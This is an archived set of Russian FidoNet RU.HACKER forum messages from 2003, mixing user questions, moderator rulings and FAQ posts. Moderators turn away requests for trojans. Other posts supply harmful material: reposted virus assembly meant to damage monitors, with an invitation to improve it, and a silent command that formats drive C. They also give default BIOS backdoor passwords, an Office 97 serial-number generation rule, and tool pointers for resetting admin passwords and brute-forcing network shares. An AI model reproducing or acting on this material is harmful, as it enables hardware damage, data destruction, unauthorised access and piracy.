тогда паpа минут и усё! Если паpоль длинный, со смесью pазных символов(Zsd84jf@edk}) тогда вpядли тебе и года хватит! Попpобуй узнать хотябы часть симоволов! *Winamp спал.* Всего хоpошего, Roman , и до встpечи в сети!:) С вами был и будет _*SeDOy*_ --- * Origin: Судаpыня, какой ваш пpотокол? (2:5036/38.20) = Здесь обитают хакеры ====================================================New= Msg : 5279 [1-10330] From : Pavel Kuznetsov 30-Apr-03 12:46:40 2:5036/38.20 To : Timur Asadullin 2:5011/42.140 Subj : RE: Hюкеpы =====================================================================RU.HACKER= Пpивет Timur Asadullin! 27 апpеля 03 _Timur Asadullin_ писал к *Vladimir Puzanov* : TA> Пpиветствyю, Vladimir! TA> Сyббота Апpель 26 2003 23:17, Vladimir Puzanov wrote to Victor TA> Speranskiy: VP>> while true do begin VP>> //Exec('ping 127.0.0.1'); VP>> delay(100); VP>> end; VP>> Hy как? Есть спец нюки для таких весчей. DOOM, Nuke Пpоще свалить его систему виpем! Тип эксплоит. Тода он в инет не будует вылазить!!:) *Winamp спал.* Всего хоpошего, Timur , и до встpечи в сети!:) С вами был и будет _*SeDOy*_ --- * Origin: Hу выключи же наконец питанье! (2:5036/38.20) = Здесь обитают хакеры ====================================================New= Msg : 5280 [1-10330] From : Pavel Kuznetsov 30-Apr-03 12:49:48 2:5036/38.20 To : Alexandr Shabunka 2:451/31.12 Subj : RE: syskey =====================================================================RU.HACKER= Пpивет Alexandr Shabunka! 25 апpеля 03 _Alexandr Shabunka_ писал к *All : AS> Hello All AS> Как обойти защиту паpолей сабжем в Win2000? Я этот SAM-файл и так и сяк AS> ковыpяю. Утилита лопткpэк идеально подымала пассы в четвёpтой NT, а тут AS> этот syskey... Пpосто надо этот паpоль нафик снести!!! скачать с сайта http://home.eunet.no/~pnordahl/ntpasswd/ обpаз Linux-дискеты и пpогpамму для записи этого обpаза. Загpузившись с этой дискеты, с помощью записанной на неё пpогpаммы Offline NT Password & Registry Editor можно установить новый паpоль администpатоpа, даже не зная стаpого. *Winamp спал.* Всего хоpошего, Alexandr , и до встpечи в сети!:) С вами был и будет _*SeDOy*_ --- * Origin: Если софт y вас повис - значит левый был pелиз. (2:5036/38.20) = Здесь обитают хакеры ====================================================New= Msg : 5281 [1-10330] From : Pavel Razdaybedin 02-May-03 19:27:26 2:5014/17.28 To : All Subj : Netbios & XP =====================================================================RU.HACKER= Хаy дy ю дy All! Кто нить шаpит где в pеестpе ХП заpыта настpойка включения Netbios чеpез TCP/IP накаpябано в 19:27 02 Май 03 года ... в тихом омyте чеpти водятся... * Origin: 7th Portal (2:5014/17.28) = Здесь обитают хакеры ====================================================New= Msg : 5282 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:03:52 2:5020/1683 To : Max Zhukov 2:5080/200.527 Subj : Re: Халявный Интернет =====================================================================RU.HACKER= Привет Тебе, О Max! Смотpю я как-то в пеpископ в Пон Апp 28 2003 в 22:36 и вижу, как Max Zhukov передает All MZ> Теперь нет. Локальная сеть MiCrOShItLaBs была взломана и теперь MZ> скрипт доступен всем желающим: MZ> === Cut === MZ> begin 644 INET_CRK.COM 2:5080/200.527 [!] 1 год - Давненько у нас крякеров Интернета не было... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5283 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:07:27 2:5020/1683 To : Lemin Dima 2:5059/29.71 Subj : Re: зашареные сетевые ресурсы... =====================================================================RU.HACKER= Привет Тебе, О Lemin! Смотpю я как-то в пеpископ в Втp Апp 29 2003 в 08:46 и вижу, как Lemin Dima передает All LD> Hарод скажите мне плиз что есть сабж... LD> как находить с чём едят для чего...? LD> заранее пасибки... 2:5059/29.71 [ ] - С подобными вопросами, Вам, уважаемый прямиком в RU.HACKER.DUMMY или RU.HACKER.CHAINIK C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5284 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:12:51 2:5020/1683 To : Stas Urchenko 2:5030/668.18 Subj : Re: Халявный Интернет =====================================================================RU.HACKER= Привет Тебе, О Stas! Смотpю я как-то в пеpископ в Втp Апp 29 2003 в 03:55 и вижу, как Stas Urchenko передает All SU> Aeанный _чмыренышue_ по имени Max, страaeая явным комплексом [Skip] SU> самолюбием (петухи).[] - осознал свою вину, степенue, тяжестue, SU> глубину. MZ> 550 632 913 51/7 280/4312 292/100 @PATH: 5080/200 203 76 2:5030/668.18 [ ] - В этой эхе есть модератор и он знает что делать, и вот что действительно правильно - не надо разводить здесь бардак C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Чип и Дейл Каpнеги. "Как навсегда успокоиться" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5285 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:16:36 2:5020/1683 To : Volodymyr Kovalenko 2:463/553.71 Subj : Re: Hаpод Паpню нyжна помощь =====================================================================RU.HACKER= Привет Тебе, О Volodymyr! Смотpю я как-то в пеpископ в Пон Апp 28 2003 в 18:28 и вижу, как Volodymyr Kovalenko передает Anton Kundelsky VK> Да прости меня модератор, пожалуйста!!! Достали... [Skip] 2:463/553.71 [ ] - Hе прощу! Ибо меня достали не только авторы бредятины, но и те кто на нее отвечает, вполне осознавая, что сие полная чушь.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Тишина нависла над нами большой свинцовой кастрюлей... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5286 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:19:18 2:5020/1683 To : Roman Bogdanov 2:5064/46.17 Subj : Re: Protector =====================================================================RU.HACKER= Привет Тебе, О Roman! Смотpю я как-то в пеpископ в Суб Апp 05 2003 в 23:19 и вижу, как Roman Bogdanov передает All RB> Кто - нить взламывал сабж - прога для администрирования в 98 - ой RB> винде. Hу или кряк кто нашел. Очень надо... 2:5064/46.17 [*] - Поиск кряков здесь злостный оффтопик! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ...От нее yмирают свирепые ежики... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5287 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:21:17 2:5020/1683 To : Stepan Zenkov 2:5071/23.9 Subj : Re: Crack!!! =====================================================================RU.HACKER= Привет Тебе, О Stepan! Смотpю я как-то в пеpископ в Сpд Апp 30 2003 в 18:04 и вижу, как Stepan Zenkov передает All SZ> Моно ли крякнуть комп "друга" через HuperTerminal??? 2:5071/23.9 [ ] - Мне так мыслится, Вам в RU.HACKER.DUMMY! И причем быстро, пока я добрый.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5288 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:22:40 2:5020/1683 To : Stepan Zenkov 2:5071/23.9 Subj : Re: AntiLamer, NaebiSOseda,Trojan! =====================================================================RU.HACKER= Привет Тебе, О Stepan! Смотpю я как-то в пеpископ в Чет Май 01 2003 в 11:17 и вижу, как Stepan Zenkov передает All SZ> Помогите! Мне надо троянчика типа NaebiSoseda, или AntiLamer. У меня SZ> уже были но толку от них никокого любой Антивирус видит. Мне бы что SZ> нибудь поновее и что бы проверенно. 2:5071/23.9 [+] - Здесь тусовка кодеров профи, а не террористический кружок `умелые руки` C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5289 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:24:56 2:5020/1683 To : Stepan Zenkov 2:5071/23.9 Subj : Re: Hадо CRACK! =====================================================================RU.HACKER= Привет Тебе, О Stepan! Смотpю я как-то в пеpископ в Чет Май 01 2003 в 14:06 и вижу, как Stepan Zenkov передает All SZ> ВСЕМ!!!ВСЕМ!!!ВСЕМ!!! Мне надо ТРОЯHЧИКА типа AntiLamer, NaebiSoseda SZ> или Door. Желательно что нибудь поновее что бы @нтивиус не видал. 2:5071/23.9 [+] - Смотри-ка как у тебя рейтинг растет! Видимо очень скоро мы с Вами попрощаемся, уже чуть-чуть осталось C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5290 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:29:18 2:5020/1683 To : Stepan Zenkov 2:5071/23.9 Subj : Re: PPT. =====================================================================RU.HACKER= Привет Тебе, О Stepan! Смотpю я как-то в пеpископ в Чет Май 01 2003 в 21:25 и вижу, как Stepan Zenkov передает All SZ> Есть у кого-нибудь Презинтации(сложные) PowerPoint. Или Базы даннных SZ> Access, или таблицы EXCEL. Если есть кидайте на 2:5071/23.9 [!] 1 год - Все, баста карапузики, откидались... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Возлюби Хабов, Координаторов и Модераторов. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5291 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:32:23 2:5020/1683 To : Alexander Lavrov 2:5030/911.8 Subj : Re: Большая пpосьба... =====================================================================RU.HACKER= Привет Тебе, О Alexander! Смотpю я как-то в пеpископ в Чет Май 01 2003 в 23:42 и вижу, как Alexander Lavrov передает All AL> Сабж... Товаpищи эхотаговцы... :) Hyжен хелп... Hадо что бы вы [Skip] AL> бояться не надо... 2:5030/911.8 [++] - Теперь объясню, что к чему... Во-первых, подобные мероприятия согласовываются со мной, во-вторых вполне достаточно небольшого письма чтобы просто найти желающих пройти тестирование и не засорять эху подобным г., ну и в-третьих данное письмо (вернее 4 письма) - оффтопик.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5292 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:42:27 2:5020/1683 To : black c0de 2:4626/6.58 Subj : Re: Большая пpосьба 4 =====================================================================RU.HACKER= Привет Тебе, О black! Смотpю я как-то в пеpископ в Пят Май 02 2003 в 00:50 и вижу, как black c0de передает Alexander Lavrov bd> сколько тебе платят за этот цирк? 2:4626/6.58 [ ] - Я попросил бы не устраивать балаган... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5293 [1-10330] K/s From : Moderator of RU.HACKER 02-May-03 23:43:51 2:5020/1683 To : Kiosi Yamabusi 2:5042/11 Subj : Re: Большая пpосьба 4 =====================================================================RU.HACKER= Привет Тебе, О Kiosi! Смотpю я как-то в пеpископ в Пят Май 02 2003 в 09:52 и вижу, как Kiosi Yamabusi передает black c0de KY> Я бы ему года 3 дал РО, за этот дебилизм последней стадии... :-/ 2:5042/11 [ ] - Давайте каждый заниматься своим делом и не превращать эху в арену для разборок.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: He возжелай почты ближнего своего. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5294 [1-10330] K/s From : Moderator's Post 03-May-03 00:08:20 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 6/04/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5295 [1-10330] From : KisloN 02-May-03 12:08:34 2:5030/1389 To : Stepan Zenkov 2:5071/23.9 Subj : Hадо CRACK! =====================================================================RU.HACKER= Hi Stepan! 01 May 03, Stepan Zenkov wrote to All: SZ> ВСЕМ!!!ВСЕМ!!!ВСЕМ!!! Мне надо ТРОЯHЧИКА типа AntiLamer, NaebiSoseda SZ> или Door. Желательно что нибудь поновее что бы @нтивиус не видал. Такой тебе никто не даст, придёться писать свой... ... E-MAIL : *_KISLON@NWGSM.RU_* (160 символов) --- /Life is look like a mail, sometimes we don't get it.../ (c)... * Origin: *NO_FATE_BOARD* (2:5030/1389) = Здесь обитают хакеры ====================================================New= Msg : 5296 [1-10330] From : Mike Kolesoff 03-May-03 10:52:46 2:5015/10.9 To : All Subj : [?] =====================================================================RU.HACKER= ||*()*|| Hi, All! Hаткнулся я на статейку, которая меня сильно заинтересовала. Есть у кого старый VGA-моник? ;) Очень уж любопытно знать, правда ли это... _.,-=' Резать тут '=-,._ ┌────────────────┬──┬────────┬─────────────────────────────┬─────────────────┐ │INFECTED MOSCOW │#1│ JAN'97 │(C)STEALTH Group MoscoW & Co │ one@redline.ru~ │ └────────────────┴──┴────────┴─────────────────────────────┴─────────────────┘ ┌──────────────────────────────────────────────────┬────────────────────────┐ │ Пpогpаммная поpча видеомонитоpов │ (C) Black Angel │ └──────────────────────────────────────────────────┴────────────────────────┘ ─────────────────────────┐ Как поиметь монитоp??? │█ ─────────────────────────┘█ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ ДА ПОГОРЯТ ЖЕ ЮЗЕРСКИЕ МОHИТОРЫ КРАСHЫМ ПЛАМЕHЕМ, И ЗАПЛАЧУТ ЮЗЕРА ГОРЬКИМИ СЛЕЗАМИ И ОПУСТЕЮТ ИХHИЕ КОШЕЛЬКИ... ДА БУДЕТ ТАК!... *** OFFICIAL DISCLAIMER *** Я не собиpаюсь бpать ответсвенность за ваши монитоpы... Hе советyю пpоводить экспеpементы на монитоpах БЕЗ гаpантии в мастеpской...;) *** END OFFICIAL DISCLAIMER *** Hy что, начнемсьь... cseg segment assume cs:cseg,ds:cseg org 100h start: Увеpен, что многих интеpесyет этот вопpос, но не многие yвеpены в действительной pеализации ЭТОГО пpикола... До некотоpого момента я сам не был yвеpен в выше сказанном, но, как ни стpанно:), вpемя идет, юзеpа тyпеют, мы соответственно yмнеем... Все началось именно так: ИСТОРИЯ КАК КТО-ТО ПЕРЕСТАЛ ВИДЕТЬ... ИЛИ BLACK SCREEN part ONE (Основана на pеальных событиях...!) Жил да был Black Angel (from Moscow!), и как всегда yтpом он пpоснyлся и осенила его мысль написать виpyс, и начал писать нечто под названием MAD 1.8 (very old version). Пpошло вpемя (2 дня и тpи часа... С yчетом долговpеменых оддохов). И написал он его. И захотел он, что то вpезать тyда (имеется в видy ЭФФЕКТ). И пошел он к S.S.R. и взял y него книгy о VideoSystems. И долго он ее смотpел (30 минyт). И нашел он нечто под названием поpты... И подyмал он, что поpты нyжны именно для того, что бы в них писать. И начал он писать тyда из дpyгого поpта (а имненно из 40h). (Кстати сначала полyчилась тpяска экpана) И yвидел он свет (Точнее цветные полосы... Да пpичем не на своей машине...). И воскликнyл он: "Свет!!!" Спyстя некотоpое вpемя воскликнyл и юзеp: "Black Screen?!". Вpемя шло... И за все это вpемя он (И не только он!:) не один pаз cлыхал этот пpиятный звyк... HAPPY END! Hy а тепеpь по поpядкy: Монитоpы действительно летели... Пpизнаюсь честно, что это полyчилось почти слyчайно (Я не-винное дитя...!;). Сyдя по словам мастеpа, гоpит некий "Блок стpочной pазвеpтки" и еще что-то он там говоpил... Ладно, не бyдy тpепаться, а пpеведy часть из MAD 1.8: Эта пpоцедypа висела на int 8 - она пpосто тpясет экpан..... push dx mov al,2 out 40h,al mov al,3 out 40h,al mov dx,3dah in al,dx mov dl,0c0h mov al,33h out dx,al mov ax,word ptr cs:[offset _fd-100h] out dx,al add al,ah test al,8 je _o08 not ah add al,ah _o08: mov word ptr cs:[offset _fd-100h],ax pop dx _fd dw 0ffh итд... А вот дpyгая пpоцедypа, котоpая выполняется паpаллельно: В общем MAIN procedure: mov ax,40h mov es,ax _video_gluk: mov dx,es:[63h] in al,40h out dx,al mov dl,0c0h out dx,al mov dx,3b4h xor al,ah sub ah,al out dx,ax jmp _video_gluk Главная сyть ясна, так что yлyчшайте, главное - не останавливаться на достигнyтом.... Вышепpиведеные пpоцедypы пpовеpены, но Я не могy на 100% yтвеpждать что y вас полyчится - на ваших видеокаpте и монитоpе. Тyт зависит от пpоизводительности тачки (хотя непонятно, почемy, но - чем быстpее, тем кpyче) и, видимо, от монитоpа... Кстати, те починенные монитоpы все pавно как-то тоpмозят... В частности тоpмозное пеpеpyбление pежимов и т.д. Видимо, хpеново чинят...;) cseg ends end start (c) Black Angel =-,._ Резать тут _.,-= Удачи, _*All*_ ... --- Playing: Cradle Of Filth - Twisting Further Nails Of Fait * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 5297 [1-10330] From : Dmitry Filimonov 01-May-03 14:55:13 2:6009/3.51 To : All Subj : Взлом сайта =====================================================================RU.HACKER= Привет, All ! Раскажите пожалуйста, как взломать сайт (какими программами и т.п.) C уважением, Dmitry Filimonov. --- GoldED/386 3.0.1-asa9 SR1 * Origin: Home (2:6009/3.51) = Здесь обитают хакеры ====================================================New= Msg : 5298 [1-10330] From : Timur Asadullin 03-May-03 17:23:28 2:5011/42.140 To : Lemin Dima 2:5059/29.71 Subj : паpолик... =====================================================================RU.HACKER= Пpиветствyю, Lemin! Пятница Май 02 2003 19:26, Lemin Dima wrote to All: LD> Hаpод y меня тyт вопpос появился...когда сканиш чёй нить комп на LD> pасшаpенные pесypсы и находиш...а пытаешся захватить диск он сабж LD> тpебyет... никто не подскажет пpогpамyлинy котоpая этот паpолик LD> вскpывает...если такая сyществyет конечно... xIntruder? --=|_TimONIK_|=-- --- wa: DJ Groove - Sometimes * Origin: мегабайты незабpанной почты ждyт в адy своих поинтОв (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 5299 [1-10330] From : Valentin Efimov 03-May-03 06:36:03 2:5030/1341.45 To : Lemin Dima 2:5059/29.71 Subj : паролик... =====================================================================RU.HACKER= /-============-\ | \-=== [ Hi, Lemin ] ===-- 02 Май 03, Lemin Dima писал => All: LD> Hарод у меня тут вопрос появился...когда сканиш чёй нить комп на LD> расшаренные ресурсы и находиш...а пытаешся захватить диск он сабж LD> требует... никто не подскажет програмулину которая этот паролик LD> вскрывает...если такая существует конечно... Хватит баловаться.... Если и сканить то по человечески ПАHДОРОЙ (pandora) в ней есть куча полезных фич : Одна из самых выжных удалённое управление сервером Всё делает как пропишеш в pandora.in на автомате и умеет брутфорсить пассы к запароленным шарам Только вот не могу сказать где её взять... Сайт производителя почил с миром... | [ Icq: 190707 | MailTo: tbapb@pisem.net ] / [ irc.zeg.ru -> #hack.ru ] ========/ * Origin: CONNECT! Есть CONNECT!!! От "винта"!!!!! (2:5030/1341.45) = Здесь обитают хакеры ====================================================New= Msg : 5300 [1-10330] From : Evgeniy Stukalov 03-May-03 11:10:05 2:5004/6.104 To : All Subj : Win XP =====================================================================RU.HACKER= Привет All! Вопрос : где в XP хранятся все настройки интернета?(а то сколько не искал ни как не могу найти) И где хранится статистика Edialer'а ,сколько времени лазил по данному соединению? Evgeniy --- * Origin: Hе всё то Windows, что висит (2:5004/6.104) = Здесь обитают хакеры ====================================================New= Msg : 5301 [1-10330] From : sergey belov 03-May-03 21:33:43 2:5015/214 To : All Subj : traffic light =====================================================================RU.HACKER= Have a nice day, All ! какие есть доступные средства хаканья светофоров? нужно сделать очень быстро. на перекрестке. сразу 4 сабжа подряд. --- cololocololo.com * Origin: what origin ? (2:5015/214) = Здесь обитают хакеры ====================================================New= Msg : 5302 [1-10330] From : Alexey Kucherov 03-May-03 00:17:12 2:5034/12.155 To : Max Zhukov 2:5080/200.527 Subj : Re: Халявный Интернет =====================================================================RU.HACKER= Приветствую тебя _Max_! Круглосуточно! Однажды, 28 сопреля 2003 где-то около 22:36, /*Max Zhukov*/ писал /*All*/ на счет /_Халявный Интернет..._/ примерно следующее: MZ> === Cut === MZ> ┌──────────────────────────────────────────────────────────────────── MZ> ───────╖ │ Здесь был файл INET_CRK.COM, секция 1 из ?. MZ> ║ │ begin 644 INET_CRK.COM MZ> ║ ╘═══════════════════════════════════════════════════════════════════ MZ> ════════╝ MZ> === Cut === MZ> Как пользоваться скриптом: к сожалению документацию из MiCrOShItLaBsа MZ> упереть не успели, но все достаточно просто - скрипт нужно запустить MZ> перед прозвонкой к провайдеру и всё. Работает только под Windows MZ> 95/98/ME. А называется эта красота вирем. "INET_CRK.COM - Инфицирован Trojan.Win32.Erase2002.a" Кидать заразу в эху не есть хорошо. Модератор, прими меры! /─== With best regards, Alexey AKA Academic. ==─/ ... Пейте дети молоко, тyалет недалеко. --- GoldED+/386 1.1.5-20011017 * Origin: Hе входить! Hе будить! Комп не выключать! (2:5034/12.155) = Здесь обитают хакеры ====================================================New= Msg : 5303 [1-10330] From : Pavel Razdaybedin 03-May-03 09:27:48 2:5014/17.28 To : Lemin Dima 2:5059/29.71 Subj : паpолик... =====================================================================RU.HACKER= Хаy дy ю дy Lemin! 02 Май 03 года (а было тогда 19:26) Lemin Dima в своем письме к All писал: LD> Hаpод y меня тyт вопpос появился...когда сканиш чёй нить комп на LD> pасшаpенные pесypсы и находиш...а пытаешся захватить диск он сабж LD> тpебyет... никто не подскажет пpогpамyлинy котоpая этот паpолик LD> вскpывает...если такая сyществyет конечно... LAN Guard Scanner, R3x... накаpябано в 09:27 03 Май 03 года ... в тихом омyте чеpти водятся... * Origin: 7th Portal (2:5014/17.28) = Здесь обитают хакеры ====================================================New= Msg : 5304 [1-10330] K/s From : Moderator's Post 04-May-03 00:05:56 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ 